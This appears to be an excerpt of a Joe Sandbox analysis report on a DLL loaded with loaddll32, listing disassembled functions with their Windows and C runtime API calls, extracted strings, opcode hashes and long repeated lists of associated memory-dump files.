Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
String ID:
API String ID: 4166353394-0
Opcode ID: a7c3fee24c8c06c7e2068825a1a5e567730e5e0b0b6a7ddae59daf53778329f0
Instruction ID: d15b157983e7e488fc5c7d8618794fcc35bb21e9bf0c03dde1500a06c142132b
Opcode Fuzzy Hash: a7c3fee24c8c06c7e2068825a1a5e567730e5e0b0b6a7ddae59daf53778329f0
Instruction Fuzzy Hash: A34101717817118FDB118F29CE84B17B7B4EB45328F24866CEC24EB781D738D8028B92

Function 6CED9154 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CED9160

Part of subcall function 6CECB71C: __FF_MSGBANNER.LIBCMT ref: 6CECB733
Part of subcall function 6CECB71C: __NMSG_WRITE.LIBCMT ref: 6CECB73A
Part of subcall function 6CECB71C: RtlAllocateHeap.NTDLL(01030000,00000000,00000001,00000000,00000000,00000000,?,6CED121A,?,?,?,00000000,?,6CED1107,00000018,6CEEAEA8), ref: 6CECB75F

_free.LIBCMT ref: 6CED9173

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: a08fabd02a8c3ca3bb832fce5b5ad9678a60c699c49dd516b09bfe016ef7accb
Instruction ID: fb8dd1c3fee8547ac5d75a28c93e93e593bc0936a0a7b18728b26859c8fc2853
Opcode Fuzzy Hash: a08fabd02a8c3ca3bb832fce5b5ad9678a60c699c49dd516b09bfe016ef7accb
Instruction Fuzzy Hash: 0011E733A04615ABDB511F749C1868937B4AF4636CB334629F9589BB80EF34A44686D1

Function 6CEC9020 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 6CEC9102
GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 6CEC910A

Strings

Unknown error, xrefs: 6CEC9159
invalid string position, xrefs: 6CEC9256

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorFormatLastMessage
String ID: Unknown error$invalid string position
API String ID: 3479602957-1837348584
Opcode ID: c738d42ac253a6bd9f7e39f3c1f83ae6526de252afd47b644044ef8c90c1f983
Instruction ID: 911d2a85cdf26f87f8165fe0ced6ed63db934358c877337032a1b1d1542d6201
Opcode Fuzzy Hash: c738d42ac253a6bd9f7e39f3c1f83ae6526de252afd47b644044ef8c90c1f983
Instruction Fuzzy Hash: 2651AA713083408FE714CF28C994B6EBBF4AB99748F60092DF4A197A92D771E649CB53

Function 6CEB4E8E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6CEB4F86

Strings

I~l, xrefs: 6CEB4F20, 6CEB4F05, 6CEB4F69
I~l, xrefs: 6CEB4F83
&, xrefs: 6CEB4F3D

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: &$I~l$I~l
API String ID: 4104443479-2871971658
Opcode ID: ecdf8038f33f11a5cf1a748a58f01fc3f37f64a094f23b3dac66fec53dfaf973
Instruction ID: f41d952c4f5b56e971a450243784b29c5e813894cf02d8c3b5eb5809c1e1c5ec
Opcode Fuzzy Hash: ecdf8038f33f11a5cf1a748a58f01fc3f37f64a094f23b3dac66fec53dfaf973
Instruction Fuzzy Hash: FD419671E491599FCB02CEA999426FDBBF4AB06308F3455ABE461F7701D6309542CB90

Function 6CEB36E7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000,?,6CEB83C5,?), ref: 6CEB36FC
WSAStringToAddressA.WS2_32(?,00000017,00000000,?,6CEB83C5,6CEB83C5), ref: 6CEB373B
_memcmp.LIBCMT ref: 6CEB3776

Strings

255.255.255.255, xrefs: 6CEB376E

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastString_memcmp
String ID: 255.255.255.255
API String ID: 1618111833-2422070025
Opcode ID: 90d7d69e59ff8d5eb7494f55dc670adb8b1c7e80d819b5c74f8080c30e0f2c8e
Instruction ID: a253d66b7d063e562186a00460c0a53b467f9f7c12055c055393e80823c878e1
Opcode Fuzzy Hash: 90d7d69e59ff8d5eb7494f55dc670adb8b1c7e80d819b5c74f8080c30e0f2c8e
Instruction Fuzzy Hash: 5731D5B2A003199FDB208EA5C9817AF77B5EF8632CF30456DE96477B80DB7158458B80

Function 6CEB23A7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 6CEB23AC
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF), ref: 6CEB241F
GetLastError.KERNEL32 ref: 6CEB242C

Part of subcall function 6CEB1A0E: __EH_prolog.LIBCMT ref: 6CEB1A13

Strings

iocp, xrefs: 6CEB243A

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: H_prolog$CompletionCreateErrorLastPort
String ID: iocp
API String ID: 998023749-976528080
Opcode ID: 04b71b1ebbaf92069911fbbded099eff29afe9d99adf6d32c9ef900f862d579b
Instruction ID: e5b75ab9f25cfa1e6331ba947236826a6934319fcd72323bc76f638e06412198
Opcode Fuzzy Hash: 04b71b1ebbaf92069911fbbded099eff29afe9d99adf6d32c9ef900f862d579b
Instruction Fuzzy Hash: A0214C71800744DACB21DF6AC6045AEFBF8EFA5364F20461FE45293B90D774A609DF92

Function 6CECC29F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CECC2B7

Part of subcall function 6CECB71C: __FF_MSGBANNER.LIBCMT ref: 6CECB733
Part of subcall function 6CECB71C: __NMSG_WRITE.LIBCMT ref: 6CECB73A
Part of subcall function 6CECB71C: RtlAllocateHeap.NTDLL(01030000,00000000,00000001,00000000,00000000,00000000,?,6CED121A,?,?,?,00000000,?,6CED1107,00000018,6CEEAEA8), ref: 6CECB75F

std::exception::exception.LIBCMT ref: 6CECC2D5
__CxxThrowException@8.LIBCMT ref: 6CECC2EA

Part of subcall function 6CECCCAA: RaiseException.KERNEL32(?,?,?,6CEEA73C,?,00000400,?,?,?,6CECC2EF,?,6CEEA73C,?,00000001), ref: 6CECCCFF

Strings

^l, xrefs: 6CECC2CA

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
